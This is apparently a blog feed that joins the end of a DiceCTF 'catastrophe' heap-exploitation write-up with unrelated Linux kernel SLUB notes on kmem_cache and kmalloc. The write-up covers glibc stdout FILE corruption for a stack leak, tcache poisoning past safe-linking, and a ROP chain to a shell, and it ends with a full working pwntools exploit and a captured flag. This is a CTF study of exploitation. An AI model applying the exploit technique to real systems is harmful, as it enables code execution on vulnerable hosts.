	  _IO_free_backup_area (f);
	  f->_IO_read_base -= MIN (nbackup,
				   f->_IO_read_base - f->_IO_buf_base);
	  f->_IO_read_ptr = f->_IO_read_base;
	}

      if (f->_IO_read_ptr == f->_IO_buf_end)
	    f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
      f->_IO_write_ptr = f->_IO_read_ptr;
      f->_IO_write_base = f->_IO_write_ptr;
      f->_IO_write_end = f->_IO_buf_end;
      f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;

      f->_flags |= _IO_CURRENTLY_PUTTING;
      if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
	f->_IO_write_end = f->_IO_write_ptr;
    }
  if (ch == EOF)
    return _IO_do_write (f, f->_IO_write_base,
			 f->_IO_write_ptr - f->_IO_write_base);
  if (f->_IO_write_ptr == f->_IO_buf_end ) /* Buffer is really full */
    if (_IO_do_flush (f) == EOF)
      return EOF;
  *f->_IO_write_ptr++ = ch;
  if ((f->_flags & _IO_UNBUFFERED)
      || ((f->_flags & _IO_LINE_BUF) && ch == '\n'))
    if (_IO_do_write (f, f->_IO_write_base,
		      f->_IO_write_ptr - f->_IO_write_base) == EOF)
      return EOF;
  return (unsigned char) ch;
}
libc_hidden_ver (_IO_new_file_overflow, _IO_file_overflow)

Given ch is \n, to trigger the _IO_do_flush call which will flush the file stream we have to:

Remove _IO_NO_WRITES from fp->_flags to avoid the first condition.
Add _IO_CURRENTLY_PUTTING to fp->_flags and give a non NULL value to f->_IO_write_base to avoid the second condition (useless code).
make f->_IO_write_ptr equal to f->_IO_buf_end to then call _IO_do_flush.

Now we reached _IO_do_flush which is basically just a macro:


// https://elixir.bootlin.com/glibc/latest/source/libio/libioP.h#L507
#define _IO_do_flush(_f) \
  ((_f)->_mode <= 0							      \
   ? _IO_do_write(_f, (_f)->_IO_write_base,				      \
		  (_f)->_IO_write_ptr-(_f)->_IO_write_base)		      \
   : _IO_wdo_write(_f, (_f)->_wide_data->_IO_write_base,		      \
		   ((_f)->_wide_data->_IO_write_ptr			      \
		    - (_f)->_wide_data->_IO_write_base)))

Given stdout is byte-oriented _IO_new_do_write is called:


// https://elixir.bootlin.com/glibc/latest/source/libio/fileops.c#L418
static size_t new_do_write (FILE *, const char *, size_t);

/* Write TO_DO bytes from DATA to FP.
   Then mark FP as having empty buffers. */

int
_IO_new_do_write (FILE *fp, const char *data, size_t to_do)
{
  return (to_do == 0
	  || (size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}
libc_hidden_ver (_IO_new_do_write, _IO_do_write)

static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
  size_t count;
  if (fp->_flags & _IO_IS_APPENDING)
    /* On a system without a proper O_APPEND implementation,
       you would need to sys_seek(0, SEEK_END) here, but is
       not needed nor desirable for Unix- or Posix-like systems.
       Instead, just indicate that offset (before and after) is
       unpredictable. */
    fp->_offset = _IO_pos_BAD;
  else if (fp->_IO_read_end != fp->_IO_write_base)
    {
      off64_t new_pos
	= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
      if (new_pos == _IO_pos_BAD)
	    return 0;
      fp->_offset = new_pos;
    }
  count = _IO_SYSWRITE (fp, data, to_do);
  if (fp->_cur_column && count)
    fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
  fp->_IO_write_end = (fp->_mode <= 0
		       && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
		       ? fp->_IO_buf_base : fp->_IO_buf_end);
  return count;
}

To avoid the _IO_SYSSEEK which could break stdout, we can add _IO_IS_APPENDING to fp->_flags. Then _IO_SYSWRITE is called and prints (_f)->_IO_write_ptr-(_f)->_IO_write_base bytes from (_f)->_IO_write_base to stdout. But that's not finished, right after we got the stack leak new_do_write initializes the output / input buffer to _IO_buf_base except for the output buffer which is initialized to _IO_buf_end (_IO_LINE_BUF not present). Thus we have to make fp->_IO_buf_base and fp->_IO_buf_end equal to valid writable pointers.

Thus we just need to:

fp->_flags = (fp->_flags & ~(_IO_NO_WRITES)) | _IO_CURRENTLY_PUTTING | _IO_IS_APPENDING.
f->_IO_write_ptr = fp->_IO_write_end = f->_IO_buf_end = &environ + 8.
fp->_IO_write_base = &environ.

Which gives:


alloc(3, 
    pwn.p64(0xfbad1800) + # _flags
    pwn.p64(environ)*3 + # _IO_read_*
    pwn.p64(environ) + # _IO_write_base
    pwn.p64(environ + 0x8)*2 + # _IO_write_ptr + _IO_write_end
    pwn.p64(environ + 8) + # _IO_buf_base
    pwn.p64(environ + 8) # _IO_buf_end
    , 0x100) 

stack = pwn.u64(io.recv(8)[:-1].ljust(8, b"\x00")) - 0x130 - 8 
# Offset of the saved rip that belongs to frame of the op_malloc function
pwn.log.info(f"stack: {hex(stack)}")

ROPchain

Now we leaked the stack address we finally just need to achieve another arbitrary write to craft the ROPchain onto the op_malloc function that writes the user input into the requested chunk.

To get the arbitrary write we just have to use the same overlapping chunks technique than last time, let's say we wanna write to target and we have prev that overlaps victim:

free(prev) ends up in the tcachebin (0x140), it has already been consolidated, it already overlaps victim.
free(victim) ends up in the tcachebin (0x110).
malloc(0x130) returns prev, thus we can corrupt victim->next and intialize it to (target ^ ((chunk_location) >> 12) to bypass safe-linking.
malloc(0x100) returns victim and tcachebin (0x110) next free chunk is target.
malloc(0x100) gives a write what where.

When we got the write what where on the stack we simply have to craft a call ot system since there is no seccomp shit. Here is the script:

free(1) # prev
free(2) # victim

alloc(5, b"T"*0x108 + pwn.p64(0x111) + pwn.p64((stack ^ ((heap + 0xb20) >> 12))), 0x130)
# victim->next = target
alloc(2, b"TT", 0x100)

alloc(3, pwn.p64(stack) + rop.chain(), 0x100) # overwrite sRBP for nothing lmao
# ROPchain on do_malloc's stackframe

And here we are:

nasm@off:~/Documents/pwn/diceCTF/catastrophe/f2$ python3 sexploit.py REMOTE HOST=mc.ax PORT=31273
[*] '/home/nasm/Documents/pwn/diceCTF/catastrophe/f2/catastrophe'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to mc.ax on port 31273: Done
/home/nasm/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] heap @ 0x559cb0184000
[*] libc: 0x7efe8a967000
[*] environ: 0x7efe8ab88200
[*] stdout: 0x7efe8ab81780
[*] stack: 0x7ffe06420710
[*] Switching to interactive mode
$ id
uid=1000 gid=1000 groups=1000
$ ls
flag.txt
run
$ cat flag.txt
hope{apparently_not_good_enough_33981d897c3b0f696e32d3c67ad4ed1e}

Resources

Appendices

Final exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn


# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('catastrophe')
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
pwn.context.timeout = 2000

host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)


def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)


gdbscript = '''
b* main
source ~/Downloads/pwndbg/gdbinit.py
continue
'''.format(**locals())

io = None

libc = pwn.ELF("libc.so.6")

io = start()

def alloc(idx, data, size, s=False):
   io.sendlineafter("-\n> ", b"1") 
   io.sendlineafter("Index?\n> ", str(idx).encode()) 
   io.sendlineafter("> ", str(size).encode()) 
   
   if s:
       io.sendafter(": ", data) 
   else:
       io.sendlineafter(": ", data) 

def free(idx):
   io.sendlineafter("> ", b"2") 
   io.sendlineafter("> ", str(idx).encode())

def view(idx):
   io.sendlineafter("> ", b"3") 
   io.sendlineafter("> ", str(idx).encode())

for i in range(7):
    alloc(i, b"", 0x100)
free(0)

view(0)

heap = ((pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) << 12))
pwn.log.info(f"heap @ {hex(heap)}")
# then we defeated safe linking lol

alloc(0, b"YY", 0x100)

alloc(7, b"YY", 0x100)
alloc(8, b"YY", 0x100)

alloc(9, b"/bin/sh\0", 0x10)

for i in range(7):
    free(i)

alloc(9, b"YY", 100)
free(9)

free(8)
free(7)
view(8)

libc.address = pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) - 0x219ce0 # - 0x1bebe0 # offset of the unsorted bin

rop = pwn.ROP(libc)
binsh = next(libc.search(b"/bin/sh\x00"))
rop.execve(binsh, 0, 0)

environ = libc.address + 0x221200 
stdout = libc.address + 0x21a780

pwn.log.info(f"libc: {hex(libc.address)}")
pwn.log.info(f"environ: {hex(environ)}")
pwn.log.info(f"stdout: {hex(stdout)}")

alloc(0, b"YY", 0x100)
free(8)
alloc(1, b"T"*0x108 + pwn.p64(0x111) + pwn.p64((stdout ^ ((heap + 0xb20) >> 12))), 0x130)
alloc(2, b"TT", 0x100)
alloc(3, pwn.p32(0xfbad1800) + pwn.p32(0) + pwn.p64(environ)*3 + pwn.p64(environ) + pwn.p64(environ + 0x8)*2 + pwn.p64(environ + 8) + pwn.p64(environ + 8), 0x100)

stack = pwn.u64(io.recv(8)[:-1].ljust(8, b"\x00")) - 0x130 - 8# - 0x1bebe0 # offset of the unsorted bin
pwn.log.info(f"stack: {hex(stack)}")

free(1) # large
free(2)

alloc(5, b"T"*0x108 + pwn.p64(0x111) + pwn.p64((stack ^ ((heap + 0xb20) >> 12))), 0x130)
alloc(2, b"TT", 0x100)

alloc(3, pwn.p64(stack) + rop.chain(), 0x100) # overwrite sRBP for nothing lmao

io.interactive()

[Linux kernel side notes - SLUB] kmem_cache

Mon, 18 Jul 2022 00:00:00 GMT

Introduction

The kmem_cache structure is one of the main structures of the SLUB algorithm. It contains pointers to other structures (cpu_slab, node array) and informations about the cache it describes (object_size, name). Every notes target linux kernel 5.18.12.

Overview of its role among the allocation process:

Let's dig into

Here is the definition of the kmem_cache structure:

// https://elixir.bootlin.com/linux/latest/source/include/linux/slub_def.h#L90
/*
 * Slab cache management.
 */
struct kmem_cache {
	struct kmem_cache_cpu __percpu *cpu_slab;
	/* Used for retrieving partial slabs, etc. */
	slab_flags_t flags;
	unsigned long min_partial;
	unsigned int size;	/* The size of an object including metadata */
	unsigned int object_size;/* The size of an object without metadata */
	struct reciprocal_value reciprocal_size;
	unsigned int offset;	/* Free pointer offset */
#ifdef CONFIG_SLUB_CPU_PARTIAL
	/* Number of per cpu partial objects to keep around */
	unsigned int cpu_partial;
	/* Number of per cpu partial slabs to keep around */
	unsigned int cpu_partial_slabs;
#endif
	struct kmem_cache_order_objects oo;

	/* Allocation and freeing of slabs */
	struct kmem_cache_order_objects max;
	struct kmem_cache_order_objects min;
	gfp_t allocflags;	/* gfp flags to use on each alloc */
	int refcount;		/* Refcount for slab cache destroy */
	void (*ctor)(void *);
	unsigned int inuse;		/* Offset to metadata */
	unsigned int align;		/* Alignment */
	unsigned int red_left_pad;	/* Left redzone padding size */
	const char *name;	/* Name (only for display!) */
	struct list_head list;	/* List of slab caches */
#ifdef CONFIG_SYSFS
	struct kobject kobj;	/* For sysfs */
#endif
#ifdef CONFIG_SLAB_FREELIST_HARDENED
	unsigned long random;
#endif

#ifdef CONFIG_NUMA
	/*
	 * Defragmentation by allocating from a remote node.
	 */
	unsigned int remote_node_defrag_ratio;
#endif

#ifdef CONFIG_SLAB_FREELIST_RANDOM
	unsigned int *random_seq;
#endif

#ifdef CONFIG_KASAN
	struct kasan_cache kasan_info;
#endif

	unsigned int useroffset;	/* Usercopy region offset */
	unsigned int usersize;		/* Usercopy region size */

	struct kmem_cache_node *node[MAX_NUMNODES];
};

cpu_slab is a pointer to the __percpu kmem_cache_cpu structure. Each cpu has its own kmem_cache_cpu to easily and faster return objects without having to trigger the "slowpath" code path which will search through the partial list of the kmem_cache_cpu or by allocating one more slab.
flags are the internal flags used to describe the cache. The whole (I hope so) list would be:

// https://elixir.bootlin.com/linux/latest/source/include/linux/slab.h#L27
/*
 * Flags to pass to kmem_cache_create().
 * The ones marked DEBUG are only valid if CONFIG_DEBUG_SLAB is set.
 */
/* DEBUG: Perform (expensive) checks on alloc/free */
#define SLAB_CONSISTENCY_CHECKS	((slab_flags_t __force)0x00000100U)
/* DEBUG: Red zone objs in a cache */
#define SLAB_RED_ZONE		((slab_flags_t __force)0x00000400U)
/* DEBUG: Poison objects */
#define SLAB_POISON		((slab_flags_t __force)0x00000800U)
/* Align objs on cache lines */
#define SLAB_HWCACHE_ALIGN	((slab_flags_t __force)0x00002000U)
/* Use GFP_DMA memory */
#define SLAB_CACHE_DMA		((slab_flags_t __force)0x00004000U)
/* Use GFP_DMA32 memory */
#define SLAB_CACHE_DMA32	((slab_flags_t __force)0x00008000U)
/* DEBUG: Store the last owner for bug hunting */
#define SLAB_STORE_USER		((slab_flags_t __force)0x00010000U)
/* Panic if kmem_cache_create() fails */
#define SLAB_PANIC		((slab_flags_t __force)0x00040000U)
/*
 * SLAB_TYPESAFE_BY_RCU - **WARNING** READ THIS!
 *
 * This delays freeing the SLAB page by a grace period, it does _NOT_
 * delay object freeing. This means that if you do kmem_cache_free()
 * that memory location is free to be reused at any time. Thus it may
 * be possible to see another object there in the same RCU grace period.
 *
 * This feature only ensures the memory location backing the object
 * stays valid, the trick to using this is relying on an independent
 * object validation pass. Something like:
 *
 *  rcu_read_lock()
 * again:
 *  obj = lockless_lookup(key);
 *  if (obj) {
 *    if (!try_get_ref(obj)) // might fail for free objects
 *      goto again;
 *
 *    if (obj->key != key) { // not the object we expected
 *      put_ref(obj);
 *      goto again;
 *    }
 *  }
 *  rcu_read_unlock();
 *
 * This is useful if we need to approach a kernel structure obliquely,
 * from its address obtained without the usual locking. We can lock
 * the structure to stabilize it and check it's still at the given address,
 * only if we can be sure that the memory has not been meanwhile reused
 * for some other kind of object (which our subsystem's lock might corrupt).
 *
 * rcu_read_lock before reading the address, then rcu_read_unlock after
 * taking the spinlock within the structure expected at that address.
 *
 * Note that SLAB_TYPESAFE_BY_RCU was originally named SLAB_DESTROY_BY_RCU.
 */
/* Defer freeing slabs to RCU */
#define SLAB_TYPESAFE_BY_RCU	((slab_flags_t __force)0x00080000U)
/* Spread some memory over cpuset */
#define SLAB_MEM_SPREAD		((slab_flags_t __force)0x00100000U)
/* Trace allocations and frees */
#define SLAB_TRACE		((slab_flags_t __force)0x00200000U)

/* Flag to prevent checks on free */
#ifdef CONFIG_DEBUG_OBJECTS
# define SLAB_DEBUG_OBJECTS	((slab_flags_t __force)0x00400000U)
#else
# define SLAB_DEBUG_OBJECTS	0
#endif

/* Avoid kmemleak tracing */
#define SLAB_NOLEAKTRACE	((slab_flags_t __force)0x00800000U)

/* Fault injection mark */
#ifdef CONFIG_FAILSLAB
# define SLAB_FAILSLAB		((slab_flags_t __force)0x02000000U)
#else
# define SLAB_FAILSLAB		0
#endif
/* Account to memcg */
#ifdef CONFIG_MEMCG_KMEM
# define SLAB_ACCOUNT		((slab_flags_t __force)0x04000000U)
#else
# define SLAB_ACCOUNT		0
#endif

#ifdef CONFIG_KASAN
#define SLAB_KASAN		((slab_flags_t __force)0x08000000U)
#else
#define SLAB_KASAN		0
#endif

/* The following flags affect the page allocator grouping pages by mobility */
/* Objects are reclaimable */
#define SLAB_RECLAIM_ACCOUNT	((slab_flags_t __force)0x00020000U)
#define SLAB_TEMPORARY		SLAB_RECLAIM_ACCOUNT	/* Objects are short-lived */

min_partial stands for the minimum amount of partial slabs (node->nr_partial) within the kmem_cache_node structure. When a slab attempts to be freed, if node->nr_partial < min_partial, the free process is aborted. For further informations to a look at this.
size stands for -- according to the comment -- The size of an object including metadata.
object_size stands for -- according to the comment -- The size of an object without metadata.
reciprocal_size is a reciprocal_value structure that stands for the reciprocal value of the size. It's basically a magic structure that allows linux to compute faster a division between an integer and a predefined constant (the size for our case). It allows linux to do a multiplication instead of a directly a division. Further informations below:

// https://elixir.bootlin.com/linux/latest/source/include/linux/reciprocal_div.h#L23
/*
 * This algorithm is based on the paper "Division by Invariant
 * Integers Using Multiplication" by Torbjörn Granlund and Peter
 * L. Montgomery.
 *
 * The assembler implementation from Agner Fog, which this code is
 * based on, can be found here:
 * http://www.agner.org/optimize/asmlib.zip
 *
 * This optimization for A/B is helpful if the divisor B is mostly
 * runtime invariant. The reciprocal of B is calculated in the
 * slow-path with reciprocal_value(). The fast-path can then just use
 * a much faster multiplication operation with a variable dividend A
 * to calculate the division A/B.
 */

struct reciprocal_value {
	u32 m;
	u8 sh1, sh2;
};

offset stands for the offset up to the next free pointer among each object.
cpu_partial stands for the number of per cpu partial objects to keep around. Which means if the sum of every freed objects among partial cpu slabs is bigger than cpu_partial, part of it is moved to the node cache.
cpu_partial_slabs stands for the number of per cpu partial slabs to keep around.
oo stands for both the number of objects among a slab and the size of the whole slab. Here are the two functions that compute the conversion and the one that computes the oo from the order and the size of the object:

// https://elixir.bootlin.com/linux/latest/source/mm/slub.c#L407
static inline unsigned int oo_order(struct kmem_cache_order_objects x)
{
	return x.x >> OO_SHIFT;
}

static inline unsigned int oo_objects(struct kmem_cache_order_objects x)
{
	return x.x & OO_MASK;
}

// https://elixir.bootlin.com/linux/latest/source/mm/slub.c#L392

static inline unsigned int order_objects(unsigned int order, unsigned int size)
{
	return ((unsigned int)PAGE_SIZE << order) / size;
}

static inline struct kmem_cache_order_objects oo_make(unsigned int order,
		unsigned int size)
{
	struct kmem_cache_order_objects x = {
		(order << OO_SHIFT) + order_objects(order, size)
	};

	return x;
}

allocflags GFP allocation flags. Here are most of them:

// https://elixir.bootlin.com/linux/latest/source/include/linux/gfp.h#L340
#define GFP_ATOMIC	(__GFP_HIGH|__GFP_ATOMIC|__GFP_KSWAPD_RECLAIM)
#define GFP_KERNEL	(__GFP_RECLAIM | __GFP_IO | __GFP_FS)
#define GFP_KERNEL_ACCOUNT (GFP_KERNEL | __GFP_ACCOUNT)
#define GFP_NOWAIT	(__GFP_KSWAPD_RECLAIM)
#define GFP_NOIO	(__GFP_RECLAIM)
#define GFP_NOFS	(__GFP_RECLAIM | __GFP_IO)
#define GFP_USER	(__GFP_RECLAIM | __GFP_IO | __GFP_FS | __GFP_HARDWALL)
#define GFP_DMA		__GFP_DMA
#define GFP_DMA32	__GFP_DMA32
#define GFP_HIGHUSER	(GFP_USER | __GFP_HIGHMEM)
#define GFP_HIGHUSER_MOVABLE	(GFP_HIGHUSER | __GFP_MOVABLE | \
			 __GFP_SKIP_KASAN_POISON)
#define GFP_TRANSHUGE_LIGHT	((GFP_HIGHUSER_MOVABLE | __GFP_COMP | \
			 __GFP_NOMEMALLOC | __GFP_NOWARN) & ~__GFP_RECLAIM)
#define GFP_TRANSHUGE	(GFP_TRANSHUGE_LIGHT | __GFP_DIRECT_RECLAIM)

/* Convert GFP flags to their corresponding migrate type */
#define GFP_MOVABLE_MASK (__GFP_RECLAIMABLE|__GFP_MOVABLE)
#define GFP_MOVABLE_SHIFT 3

refcount stands for the amount of time the kmem_cache has been reused and "aliased". For further informations, take a look at __kmem_cache_alias here.
ctor stands for a constructor called at every object intitialization, it's called in setup_object which is itself called in shuffle_freelist and in allocate_slab at the slab allocation level so.
inuse stands for the offset of the first metadata, we can distinguish several cases:

// https://elixir.bootlin.com/linux/v5.18.12/source/mm/slub.c#L987
/* object + s->inuse
 * 	Meta data starts here.
 *
 * 	A. Free pointer (if we cannot overwrite object on free)
 * 	B. Tracking data for SLAB_STORE_USER
 *	C. Padding to reach required alignment boundary or at minimum
 * 		one word if debugging is on to be able to detect writes
 * 		before the word boundary.
 *
 *	Padding is done using 0x5a (POISON_INUSE)
*/

align alignement needed for each object.
red_left_pad stands for the left pad to prevent right out of bound write.

name stands for the cache name.
list stands for the doubly linked list that groups every kmem_cache, the HEAD is the slab_caches symbol.
kobj stands for the internal kobjets reference counter, see this LWN article for further informations.
random stands for the secret kept in each kmem_cache when the kernel is compiled with the CONFIG_SLAB_FREELIST_HARDENED. It's initialized in kmem_cache_open and used to decrypt the next free pointer of free chunks belonging to the cache:

// https://elixir.bootlin.com/linux/v5.18.12/source/mm/slub.c#L4180
static int kmem_cache_open(struct kmem_cache *s, slab_flags_t flags)
{
	s->flags = kmem_cache_flags(s->size, flags, s->name);
#ifdef CONFIG_SLAB_FREELIST_HARDENED
	s->random = get_random_long();

// https://elixir.bootlin.com/linux/v5.18.12/source/mm/slub.c#L334

/*
 * Returns freelist pointer (ptr). With hardening, this is obfuscated
 * with an XOR of the address where the pointer is held and a per-cache
 * random number.
 */
static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
				 unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
	/*
	 * When CONFIG_KASAN_SW/HW_TAGS is enabled, ptr_addr might be tagged.
	 * Normally, this doesn't cause any issues, as both set_freepointer()
	 * and get_freepointer() are called with a pointer with the same tag.
	 * However, there are some issues with CONFIG_SLUB_DEBUG code. For
	 * example, when __free_slub() iterates over objects in a cache, it
	 * passes untagged pointers to check_object(). check_object() in turns
	 * calls get_freepointer() with an untagged pointer, which causes the
	 * freepointer to be restored incorrectly.
	 */
	return (void *)((unsigned long)ptr ^ s->random ^
			swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
	return ptr;
#endif
}

remote_node_defrag_ratio bigger the remote_node_defrag_ratio is, more the allocator returns objets that belong to remote nodes:

// https://elixir.bootlin.com/linux/v5.18.12/source/mm/slub.c#L2200
	/*
	 * The defrag ratio allows a configuration of the tradeoffs between
	 * inter node defragmentation and node local allocations. A lower
	 * defrag_ratio increases the tendency to do local allocations
	 * instead of attempting to obtain partial slabs from other nodes.
	 *
	 * If the defrag_ratio is set to 0 then kmalloc() always
	 * returns node local objects. If the ratio is higher then kmalloc()
	 * may return off node objects because partial slabs are obtained
	 * from other nodes and filled up.
	 *
	 * If /sys/kernel/slab/xx/remote_node_defrag_ratio is set to 100
	 * (which makes defrag_ratio = 1000) then every (well almost)
	 * allocation will first attempt to defrag slab caches on other nodes.
	 * This means scanning over all nodes to look for partial slabs which
	 * may be expensive if we do it every time we are trying to find a slab
	 * with available objects.
	 */

random_seq represents a shuffled array of offset of chunks that belong to a slab. Given the freelist stuff is done only on a slab, the offset should not exceed page_limit which is nr_objects * size.cDepends on CONFIG_SLAB_FREELIST_RANDOM. Here are some functions that use random_seq:

// https://elixir.bootlin.com/linux/v5.18.12/source/mm/slub.c#L1855

/* Get the next entry on the pre-computed freelist randomized */
static void *next_freelist_entry(struct kmem_cache *s, struct slab *slab,
				unsigned long *pos, void *start,
				unsigned long page_limit,
				unsigned long freelist_count)
{
	unsigned int idx;

	/*
	 * If the target page allocation failed, the number of objects on the
	 * page might be smaller than the usual size defined by the cache.
	 */
	do {
		idx = s->random_seq[*pos];
		*pos += 1;
		if (*pos >= freelist_count)
			*pos = 0;
	} while (unlikely(idx >= page_limit));

	return (char *)start + idx;
}

// https://elixir.bootlin.com/linux/v5.18.12/source/mm/slub.c#L1843

/* Initialize each random sequence freelist per cache */
static void __init init_freelist_randomization(void)
{
	struct kmem_cache *s;

	mutex_lock(&slab_mutex);

	list_for_each_entry(s, &slab_caches, list)
		init_cache_random_seq(s);

	mutex_unlock(&slab_mutex);
}

// https://elixir.bootlin.com/linux/v5.18.12/source/mm/slub.c#L1816

static int init_cache_random_seq(struct kmem_cache *s)
{
	unsigned int count = oo_objects(s->oo);
	int err;

	/* Bailout if already initialised */
	if (s->random_seq)
		return 0;

	err = cache_random_seq_create(s, count, GFP_KERNEL);
	if (err) {
		pr_err("SLUB: Unable to initialize free list for %s\n",
			s->name);
		return err;
	}

	/* Transform to an offset on the set of pages */
	if (s->random_seq) {
		unsigned int i;

		for (i = 0; i < count; i++)
			s->random_seq[i] *= s->size;
	}
	return 0;
}

kasan_info is a cache used by the Kernel Address Sanizer (KASAN), it keeps track of freed chunks, especially by storing informations within the redzone. Here are some of the operations performed by KASAN:

// https://elixir.bootlin.com/linux/v5.18.12/source/mm/kasan/common.c#L138

void __kasan_cache_create(struct kmem_cache *cache, unsigned int *size,
			  slab_flags_t *flags)
{
	unsigned int ok_size;
	unsigned int optimal_size;

	/*
	 * SLAB_KASAN is used to mark caches as ones that are sanitized by
	 * KASAN. Currently this flag is used in two places:
	 * 1. In slab_ksize() when calculating the size of the accessible
	 *    memory within the object.
	 * 2. In slab_common.c to prevent merging of sanitized caches.
	 */
	*flags |= SLAB_KASAN;

	if (!kasan_stack_collection_enabled())
		return;

	ok_size = *size;

	/* Add alloc meta into redzone. */
	cache->kasan_info.alloc_meta_offset = *size;
	*size += sizeof(struct kasan_alloc_meta);

	/*
	 * If alloc meta doesn't fit, don't add it.
	 * This can only happen with SLAB, as it has KMALLOC_MAX_SIZE equal
	 * to KMALLOC_MAX_CACHE_SIZE and doesn't fall back to page_alloc for
	 * larger sizes.
	 */
	if (*size > KMALLOC_MAX_SIZE) {
		cache->kasan_info.alloc_meta_offset = 0;
		*size = ok_size;
		/* Continue, since free meta might still fit. */
	}

	/* Only the generic mode uses free meta or flexible redzones. */
	if (!IS_ENABLED(CONFIG_KASAN_GENERIC)) {
		cache->kasan_info.free_meta_offset = KASAN_NO_FREE_META;
		return;
	}

	/*
	 * Add free meta into redzone when it's not possible to store
	 * it in the object. This is the case when:
	 * 1. Object is SLAB_TYPESAFE_BY_RCU, which means that it can
	 *    be touched after it was freed, or
	 * 2. Object has a constructor, which means it's expected to
	 *    retain its content until the next allocation, or
	 * 3. Object is too small.
	 * Otherwise cache->kasan_info.free_meta_offset = 0 is implied.
	 */
	if ((cache->flags & SLAB_TYPESAFE_BY_RCU) || cache->ctor ||
	    cache->object_size < sizeof(struct kasan_free_meta)) {
		ok_size = *size;

		cache->kasan_info.free_meta_offset = *size;
		*size += sizeof(struct kasan_free_meta);

		/* If free meta doesn't fit, don't add it. */
		if (*size > KMALLOC_MAX_SIZE) {
			cache->kasan_info.free_meta_offset = KASAN_NO_FREE_META;
			*size = ok_size;
		}
	}

	/* Calculate size with optimal redzone. */
	optimal_size = cache->object_size + optimal_redzone(cache->object_size);
	/* Limit it with KMALLOC_MAX_SIZE (relevant for SLAB only). */
	if (optimal_size > KMALLOC_MAX_SIZE)
		optimal_size = KMALLOC_MAX_SIZE;
	/* Use optimal size if the size with added metas is not large enough. */
	if (*size < optimal_size)
		*size = optimal_size;
}

void __kasan_cache_create_kmalloc(struct kmem_cache *cache)
{
	cache->kasan_info.is_kmalloc = true;
}

size_t __kasan_metadata_size(struct kmem_cache *cache)
{
	if (!kasan_stack_collection_enabled())
		return 0;
	return (cache->kasan_info.alloc_meta_offset ?
		sizeof(struct kasan_alloc_meta) : 0) +
		(cache->kasan_info.free_meta_offset ?
		sizeof(struct kasan_free_meta) : 0);
}

struct kasan_alloc_meta *kasan_get_alloc_meta(struct kmem_cache *cache,
					      const void *object)
{
	if (!cache->kasan_info.alloc_meta_offset)
		return NULL;
	return kasan_reset_tag(object) + cache->kasan_info.alloc_meta_offset;
}

#ifdef CONFIG_KASAN_GENERIC
struct kasan_free_meta *kasan_get_free_meta(struct kmem_cache *cache,
					    const void *object)
{
	BUILD_BUG_ON(sizeof(struct kasan_free_meta) > 32);
	if (cache->kasan_info.free_meta_offset == KASAN_NO_FREE_META)
		return NULL;
	return kasan_reset_tag(object) + cache->kasan_info.free_meta_offset;
}
#endif

void __kasan_poison_slab(struct slab *slab)
{
	struct page *page = slab_page(slab);
	unsigned long i;

	for (i = 0; i < compound_nr(page); i++)
		page_kasan_tag_reset(page + i);
	kasan_poison(page_address(page), page_size(page),
		     KASAN_KMALLOC_REDZONE, false);
}

Linux kernel side notes

Mon, 18 Jul 2022 00:00:00 GMT

Here are just some side notes about linux kernel internals I put here to avoid to have to learn same things again and again. Every notes target linux kernel 5.18.12. There will be a lot of code for which I do not comment the whole part.

Kernel heap management (SLUB, SLAB, SLOB)

Same way as for userland, the kernel has many algorithms to manage memory allocation according to what the kernel is looking for (huge resources or not, safety needs etc).

SLUB

The SLUB algorithm is the algorithm I know the more, so that's the one I will cover first. To allocate dynamically memory, the kernel provides the kmalloc function to which you can provide flags:

/**
 * kmalloc - allocate memory
 * @size: how many bytes of memory are required.
 * @flags: the type of memory to allocate.
 *
 * kmalloc is the normal method of allocating memory
 * for objects smaller than page size in the kernel.
 *
 * The allocated object address is aligned to at least ARCH_KMALLOC_MINALIGN
 * bytes. For @size of power of two bytes, the alignment is also guaranteed
 * to be at least to the size.
 *
 * The @flags argument may be one of the GFP flags defined at
 * include/linux/gfp.h and described at
 * :ref:`Documentation/core-api/mm-api.rst <mm-api-gfp-flags>`
 *
 * The recommended usage of the @flags is described at
 * :ref:`Documentation/core-api/memory-allocation.rst <memory_allocation>`
 *
 * Below is a brief outline of the most useful GFP flags
 *
 * %GFP_KERNEL
 *	Allocate normal kernel ram. May sleep.
 *
 * %GFP_NOWAIT
 *	Allocation will not sleep.
 *
 * %GFP_ATOMIC
 *	Allocation will not sleep.  May use emergency pools.
 *
